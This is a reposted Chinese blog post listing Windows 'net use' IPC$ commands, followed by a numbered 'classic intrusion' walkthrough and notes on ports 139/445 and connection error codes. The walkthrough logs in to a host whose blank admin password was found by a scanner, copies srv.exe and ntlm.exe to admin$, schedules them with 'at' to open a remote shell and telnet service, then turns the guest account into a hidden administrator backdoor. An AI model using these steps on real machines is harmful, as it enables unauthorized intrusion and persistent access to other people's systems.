注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

勇气

终生读书

 
 
 

日志

 
 

【转载】常用的远程连接命令!  

2013-02-16 17:34:49|  分类: PC |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |
本文转载自wckcomputer《常用的远程连接命令!》

建立空连接  net use \\IP\ipc$Content$nbsp;"" /user:"" (一定要注意:这一行命令中包含了3个空格)  

建立非空连接  net use \\IP\ipc$Content$nbsp;"用户名" /user:"密码" (同样有3个空格)   

映射默认共享    net use z: \\IP\c$Content$nbsp;"密码" /user:"用户名" (即可将对方的c盘映射为自己的z盘,其他盘类推)   

如果已经和目标建立了ipc$,则可以直接用IP+盘符+$访问,具体命令 net use z: \\IP\c$   

删除一个ipc$连接  net use \\IP\ipc$Content$/del   

删除共享映射  net use c: /del 删除映射的c盘,其他盘类推   net use * /del 删除全部,会有提示要求按y确认   经典入侵模式   

1.C:\>net use \\127.0.0.1\IPC$Content$nbsp;"" /user:"admintitrators"   这是用《流光》扫到的用户名是administrators,密码为"空"的IP地址(空口令?哇,运气好到家了),如果是打算攻击的话,就可以用这样的命令来与127.0.0.1建立一个连接,因为密码为"空",所以第一个引号处就不用输入,后面一个双引号里的是用户名,输入administrators,命令即可成功完成。   

2. C:\>copy srv.exe \\127.0.0.1\admin$Content$nbsp;   先复制srv.exe上去,在流光的Tools目录下就有(这里的$是指admin用户的c:\winnt\system32\,大家还可以使用c$、d$,意思是C盘与D盘,这看你要复制到什么地方去了)。   3.C:\>net time \\127.0.0.1   查查时间,发现127.0.0.1 的当前时间是 2002/3/19 上午 11:00,命令成功完成。   4.C:\>at \\127.0.0.1 11:05 srv.exe   用at命令启动srv.exe吧(这里设置的时间要比主机时间快,不然你怎么启动啊,呵呵!)   

5.C:\>net time \\127.0.0.1   再查查到时间没有?如果127.0.0.1 的当前时间是 2002/3/19 上午 11:05,那就准备开始下面的命令。   

6.C:\>telnet 127.0.0.1 99   这里会用到Telnet命令吧,注意端口是99。Telnet默认的是23端口,但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。   虽然我们可以Telnet上去了,但是SRV是一次性的,下次登录还要再激活!所以我们打算建立一个Telnet服务!这就要用到ntlm了   

7.C:\>copy ntlm.exe \\127.0.0.1\admin$Content$nbsp;   用Copy命令把ntlm.exe上传到主机上(ntlm.exe也是在《流光》的Tools目录中)。   

8.C:\WINNT\system32>ntlm   输入ntlm启动(这里的C:\WINNT\system32>指的是对方计算机,运行ntlm其实是让这个程序在对方计算机上运行)。当出现"DONE"的时候,就说明已经启动正常。然后使用"net start telnet"来开启Telnet服务! 9.Telnet 127.0.0.1,接着输入用户名与密码就进入对方了,操作就像在DOS上操作一样简单!(然后你想做什么?想做什么就做什么吧,哈哈)   为了以防万一,我们再把guest激活加到管理组   

10.C:\>net user guest /active:yes   将对方的Guest用户激活   

11.C:\>net user guest 1234   将Guest的密码改为1234,或者你要设定的密码   

12.C:\>net localgroup administrators guest /add   

将Guest变为Administrator^_^(如果管理员密码更改,guest帐号没改变的话,下次我们可以用guest再次访问这台计算机)   

ipc$与空连接,139,445端口,默认共享的关系   

以上四者的关系可能是菜鸟很困惑的一个问题,不过大部分文章都没有进行特别的说明,其实我理解的也不是很透彻,都是在与大家交流中总结出来的.(一个有良好讨论氛围的BBS可以说是菜鸟的天堂)   

ipc$与空连接   

不需要用户名与密码的ipc$连接即为空连接,一旦你以某个用户或管理员的身份登陆(即以特定的用户名和密码进行ipc$连接),自然就不能叫做空连接了.   

许多人可能要问了,既然可以空连接,那我以后就空连接好了,为什么还要费九牛二虎之力去扫描弱口令,呵呵,原因前面提到过,当你以空连接登陆时,你没有任何权限(很郁闷吧),而你以用户或管理员的身份登陆时,你就会有相应的权限(有权限谁不想呀,所以还是老老实实扫吧,不要偷懒哟).   

ipc$与139,445端口   

ipc$连接可以实现远程登陆及对默认共享的访问;而139端口的开启表示netbios协议的应用,我们可以通过139,445(win2000)端口实现对共享文件/打印机的访问,因此一般来讲,ipc$连接是需要139或445端口来支持的.   

ipc$与默认共享   

默认共享是为了方便管理员远程管理而默认开启的共享(你当然可以关闭它),即所有的逻辑盘(c$,d$,e$……)和系统目录winnt或windows(admin$),我们通过ipc$连接可以实现对这些默认共享的访问(前提是对方没有关闭这些默认共享)   ipc$连接失败的原因   

以下5个原因是比较常见的:   

1)你的系统不是NT或以上操作系统;   

2)对方没有打开ipc$默认共享   

3)对方未开启139或445端口(惑被防火墙屏蔽)   

4)你的命令输入有误(比如缺少了空格等)   

5)用户名或密码错误(空连接当然无所谓了)   另外,你也可以根据返回的错误号分析原因:   错误号5,拒绝访问 : 很可能你使用的用户不是管理员权限的,先提升权限;   错误号51,Windows 无法找到网络路径 : 网络有问题;   错误号53,找不到网络路径 : ip地址错误;目标未开机;目标lanmanserver服务未启动;目标有防火墙(端口过滤);   错误号67,找不到网络名 : 你的lanmanworkstation服务未启动;目标删除了ipc$;   错误号1219,提供的凭据与已存在的凭据集冲突 : 你已经和对方建立了一个ipc$,请删除再连。

  评论这张
 
阅读(147)| 评论(0)
推荐 转载

历史上的今天

在LOFTER的更多文章

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2017